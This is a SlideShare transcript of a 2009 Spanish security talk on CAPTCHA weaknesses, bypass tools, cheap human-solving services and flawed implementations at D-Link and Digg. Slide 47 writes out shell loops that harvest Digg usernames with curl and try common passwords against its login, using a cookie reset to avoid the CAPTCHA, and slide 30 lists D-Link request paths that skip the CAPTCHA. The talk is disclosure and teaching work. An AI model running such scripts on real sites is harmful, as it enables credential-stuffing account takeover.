C[R]APCHAS.



                               Alejandro Ramos
                                    CISSP, CISA




Salamanc...
Completely Automated Public Turing test to
                                          CAPTCHAS.

          tell Computers a...
Introducción


                                          • Creador Luis von Ahn,
                                         ...
• Antes de llevar a cabo una acción se
       comprueba la condición de Hommer.
     • Previene que software automático re...
Tipos de captcha




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
¿Contraseña?                              ¿Correcta?

                             NO                                     ...
Evolución

                                             EZ-Gimpy



                                                      ...
Captchas no resolvibles                               Accesibilidad




                             http://www.w3.org/TR/...
Vulnerabilidades
   • Tipo de letra:
        –   No variable
        –   Sin rotación
        –   Colores fijos
        – ...
Diseño seguro


        •   Rotar colores en la fuente y el fondo.
        •   Uso de mayúsculas y minúsculas.
        •  ...
Métodos para saltar CAPTCHAs




     • Mediante el uso de
       OCR / IVR
     • Explotando la
       implantación - MoB...
Cortar, copiar, pintar y colorear




                                                                    A
              ...
Herramientas Disponibles




     • PWNtcha: http://caca.zoy.org/wiki/PWNtcha
     • CAP-OCR: http://cap-cap.ru/
     • Ca...
PWNtcha




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Ataques 2008




        Google
        (Jan 17) 20%




        Hotmail
        (Feb 6) 30-35%




        Yahoo
        ...
Software




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
jDownloader. jAntiCaptcha




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Software comercial




               http://www.guruperl.net/products/captcha-bypass/


C[R]APCHAS.
Curso de Verano - Sal...
Software comercial




               http://www.guruperl.net/products/captcha-bypass/


C[R]APCHAS.
Curso de Verano - Sal...
Software comercial




               http://www.guruperl.net/products/captcha-bypass/
                         http://xru...
Software comercial




               http://www.guruperl.net/products/captcha-bypass/
                         http://xru...
Servicios Captcha




                        http://www.lafdc.com/captcha/
C[R]APCHAS.
Curso de Verano - Salamanca, julio...
Captchas de Voz


    •No son efectivos
    •Más inseguros que los tradicionales de imágenes
    •Poco difundidos
    •Pru...
Resolviendo Captchas a Bajo coste




    Resolviendo CAPTCHAS Semiautomáticamente
C[R]APCHAS.
Curso de Verano - Salamanca...
A mano…




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Decaptcher.com




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Explotando usuarios




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Explotando usuarios




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
IMPLANTACIONES


C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Router D-Link
    1. Modificación de los DNS del
       router por malware (pharming)
    2. D-Link actualiza firmware
   ...
Fallos genéricos en Implantaciones

     • Re-utilizando el ID de sesión para un
       CAPTCHA conocido
     • Envío de i...
DNI-Pasaporte




<td align="center" style="font-size: 30pt; font-family: Courier; color: blue;">T</td>
<td align="center"...
Red.Es




                 http://mnm.uib.es/gallir/posts/2007/06/09/1108

C[R]APCHAS.
Curso de Verano - Salamanca, julio...
Worlds’s most influential person   Revista Time




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Análisis del Captcha - Recaptcha




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Análisis del Captcha - Recaptcha




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
reCaptcha.com




        •60 millones de captcha resueltos por día
        •Technorati, meneame, twitter, lastfm.es …. Et...
Inundación de “penis”




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Inundación de “penis”




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Inundación de “penis”




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Megaupload.com

         Descarga de Archivo




        http://wwwq3.megaupload.com/gencap.php?60d8950a074984e0.gif




C...
Captchanumbers (php class)




      http://www.lucianobello.com.ar/post/captchas-the-good-the-
                          ...
Digg.com




C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Digg.com

 •Envío usuario y contraseña mediante un POST

 •El servidor crea una sesión y devuelve un 302 (redirección) a
 ...
Digg.com
                                             302
                                          Set-Cookie
           ...
Digg.com
                                             302
  Se elimina
    cookie                                Set-Cooki...
Digg.com
 Usuarios demócratas: (nicknames == usernames)
 for i in `seq 1 1018`; do
  curl –d "getdpage=$i&id=10&page=3&fri...
Digg.com




           http://www.enriquedans.com/2009/04/digg-0wned.html

C[R]APCHAS.
Curso de Verano - Salamanca, julio...
Digg.com




           http://www.enriquedans.com/2009/04/digg-0wned.html

C[R]APCHAS.
Curso de Verano - Salamanca, julio...
Conclusiones


     • Los CAPTCHA son un sistema de eficacia
     dudable.
     •El mayor riesgo al que se somete es la
  ...
C[R]APCHAS.
Curso de Verano - Salamanca, julio 2009
Upcoming SlideShare
Loading in...5
×

Crapcha Sv1.0 Slide Share

3,654

Published on

CAPTCHAs

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,654
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
132
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Crapcha Sv1.0 Slide Share

  1. 1. C[R]APCHAS. Alejandro Ramos CISSP, CISA Salamanca – Julio 2009 securitybydefault.com
  2. 2. Completely Automated Public Turing test to CAPTCHAS. tell Computers and Humans Apart. Prueba de Turing pública y automática para C[R]APCHAS. diferenciar máquinas y humano Curso de Verano - Salamanca, julio 2009
  3. 3. Introducción • Creador Luis von Ahn, Manuel Blum y Nicolas J. Hooper • Año 2000 • Evitar añadir sitios al directorio de Yahoo! automáticamente. • Pregunta – Respuesta • Reverse Turing C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  4. 4. • Antes de llevar a cabo una acción se comprueba la condición de Hommer. • Previene que software automático realice: – SPAM: blogs, wikis, foros – Registro masivo de usuarios – Votaciones – Fuerza Bruta de usuarios / contraseñas • Diseño: – Fácil de resolver para el hombre – Difícil de resolver para la máquina – Fácil de generar y evaluar C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  5. 5. Tipos de captcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  6. 6. ¿Contraseña? ¿Correcta? NO SI ¿Contraseña? ¿Correcta? NO SI ¿Contraseña? ¿Correcta? NO SI ¿allant? NO SI C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  7. 7. Evolución EZ-Gimpy + Contraste + Fondo + Fuente no fija + Línea - Fondos + Superposición C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  8. 8. Captchas no resolvibles Accesibilidad http://www.w3.org/TR/turingtest/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  9. 9. Vulnerabilidades • Tipo de letra: – No variable – Sin rotación – Colores fijos – Sin deformación – Sin superposición – Misma posición de caracteres – Misma longitud de caracteres – Reducido código de caracteres • Fondo: – Colores fijos – Sin textura o textura fija C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  10. 10. Diseño seguro • Rotar colores en la fuente y el fondo. • Uso de mayúsculas y minúsculas. • Letras más oscuras y más claras que el fondo. • Uso de escala de colores (gradient). • No alinear los caracteres horizontalmente. • Sobreponer las letras. • No utilizar palabras de diccionario. • Distinta longitud de caracteres. • Dibujar líneas sobre las letras del mismo color. • Amplio código de caracteres. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  11. 11. Métodos para saltar CAPTCHAs • Mediante el uso de OCR / IVR • Explotando la implantación - MoBIC • Usando mano de obra barata C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  12. 12. Cortar, copiar, pintar y colorear A R C 3 I C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  13. 13. Herramientas Disponibles • PWNtcha: http://caca.zoy.org/wiki/PWNtcha • CAP-OCR: http://cap-cap.ru/ • Captcha Breaker: http://churchturing.org/captcha- dist/ • aiCaptcha: http://www.mperfect.net/aiCaptcha/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  14. 14. PWNtcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  15. 15. Ataques 2008 Google (Jan 17) 20% Hotmail (Feb 6) 30-35% Yahoo (Feb 22) 30-35% C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  16. 16. Software C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  17. 17. jDownloader. jAntiCaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  18. 18. Software comercial http://www.guruperl.net/products/captcha-bypass/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  19. 19. Software comercial http://www.guruperl.net/products/captcha-bypass/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  20. 20. Software comercial http://www.guruperl.net/products/captcha-bypass/ http://xrumer-palladium.blogspot.com/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  21. 21. Software comercial http://www.guruperl.net/products/captcha-bypass/ http://xrumer-palladium.blogspot.com/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  22. 22. Servicios Captcha http://www.lafdc.com/captcha/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  23. 23. Captchas de Voz •No son efectivos •Más inseguros que los tradicionales de imágenes •Poco difundidos •Pruebas de concepto para Google •IVR (Interactive Voice Response) http://blog.wintercore.com/?p=11 http://vorm.net/captchas C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  24. 24. Resolviendo Captchas a Bajo coste Resolviendo CAPTCHAS Semiautomáticamente C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  25. 25. A mano… C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  26. 26. Decaptcher.com C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  27. 27. Explotando usuarios C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  28. 28. Explotando usuarios C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  29. 29. IMPLANTACIONES C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  30. 30. Router D-Link 1. Modificación de los DNS del router por malware (pharming) 2. D-Link actualiza firmware añadiendo un CAPTCHA a la autenticación. 3. La implantación es incorrecta, paginas como la que gestiona contraseña WPA, son accedidas sin necesidad de CAPTCHA GET /post_login.xml?hash=c8[…]a&auth_code=02F&auth_id=26 GET / /post_login.xml?hash=c8[…]6a GET / /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0 http://www.milw0rm.com/exploits/8696 C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  31. 31. Fallos genéricos en Implantaciones • Re-utilizando el ID de sesión para un CAPTCHA conocido • Envío de identificación de CAPTCHA + solución, re-utilización de CAPTCHAs conocidos. • Reiniciando intentos con usuario conocido • Uso de un número reducido de CAPTCHAS (generación de BBDD) • Vulnerable a otros ataques web: XSS, CSRF, etc C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  32. 32. DNI-Pasaporte <td align="center" style="font-size: 30pt; font-family: Courier; color: blue;">T</td> <td align="center" style="font-size: 30pt; font-family: Arial; color: blue;">B</td> <td align="center" style="font-size: 30pt; font-family: Arial Black; color: blue;">I</td> <td align="center" style="font-size: 30pt; font-family: Arial Black; color: blue;">J</td> http://rafavargas.com/2008/05/14/un-candidato-a-peor-captcha-de-la-historia/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  33. 33. Red.Es http://mnm.uib.es/gallir/posts/2007/06/09/1108 C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  34. 34. Worlds’s most influential person Revista Time C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  35. 35. Análisis del Captcha - Recaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  36. 36. Análisis del Captcha - Recaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  37. 37. reCaptcha.com •60 millones de captcha resueltos por día •Technorati, meneame, twitter, lastfm.es …. Etc •10 millones de palabras por día C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  38. 38. Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  39. 39. Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  40. 40. Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  41. 41. Megaupload.com Descarga de Archivo http://wwwq3.megaupload.com/gencap.php?60d8950a074984e0.gif C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  42. 42. Captchanumbers (php class) http://www.lucianobello.com.ar/post/captchas-the-good-the- bad-and-the-ugly/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  43. 43. Digg.com C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  44. 44. Digg.com •Envío usuario y contraseña mediante un POST •El servidor crea una sesión y devuelve un 302 (redirección) a otra página que comprueba si la sesión es correcta o incorrecta en base al usuario y contraseña •Si la contraseña es válida paso, si no es válida me envía a la página de autenticación con un error y la misma sesión que suma 1 error fallido. •Elimino la sesión (y con ello el contador) y repito el envío de usuario y contraseña, volviendo al punto 1. Por lo que el captcha no aparecerá nunca al no sumar los cuatro intentos. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  45. 45. Digg.com 302 Set-Cookie Se comprueba POST Cookie? session con u/p generada Hay Cookie Fallos = 3 Valido? Cookie: fallos+1 CAPTCHA Validado C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  46. 46. Digg.com 302 Se elimina cookie Set-Cookie Se comprueba POST Cookie? session con u/p generada Hay Cookie Fallos = 3 Valido? Cookie: fallos +1 CAPTCHA Validado C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  47. 47. Digg.com Usuarios demócratas: (nicknames == usernames) for i in `seq 1 1018`; do curl –d "getdpage=$i&id=10&page=3&friends=0" "http://digg.com/politics/Bobama_s_44th_Amer/who” | grep users|sed -e 's|.*href="/users/(.*)">.*|1|g’ done Password “123456” (nadie la usa) for pass in password 123456; do for i in `cat USUARIOSOBAMA`; do echo -n $i:$pass curl -c digg.txt -s -L -D - -d "username=$i&password=$pass&persistent=on" 'http://digg.com/login/prepare/digg'| grep -Ei "D.meta.user.loggedIn|incorrect"; done done |tee -a passwd2.digg C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  48. 48. Digg.com http://www.enriquedans.com/2009/04/digg-0wned.html C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  49. 49. Digg.com http://www.enriquedans.com/2009/04/digg-0wned.html C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  50. 50. Conclusiones • Los CAPTCHA son un sistema de eficacia dudable. •El mayor riesgo al que se somete es la mano de obra barata. •Su implantación es compleja y requiere de un análisis profundo. •Un diseño incorrecto puede volver la medida inútil C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  51. 51. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×